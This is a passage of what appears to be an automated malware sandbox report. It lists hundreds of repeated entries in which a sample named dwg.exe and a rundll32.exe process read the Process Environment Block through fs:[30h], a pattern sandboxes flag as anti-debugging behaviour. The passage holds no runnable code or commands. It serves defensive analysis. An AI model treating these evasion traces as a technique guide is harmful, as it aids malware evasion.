      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30FDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2F8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C6DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E284A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E284A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E258A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E245210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E263A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2D4257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2452A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E273B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E273B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E318B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E274BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E315BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E251B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E251B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2FD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2703E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E314015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E314015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E302073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E260050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E260050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2890AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C3884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2440E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2458EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2DB8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E249100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2761A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2761A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2C51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3049A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E26C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2D41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056587D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565866 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005658D6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564AB9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00564F41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044AC450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04453D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04493540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044C3D40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04437D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04423D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0449A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04444D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04496DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044C8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04412D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044435A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04441DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04427E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AE73 mov eax, dword ptr fs:[00000030h]
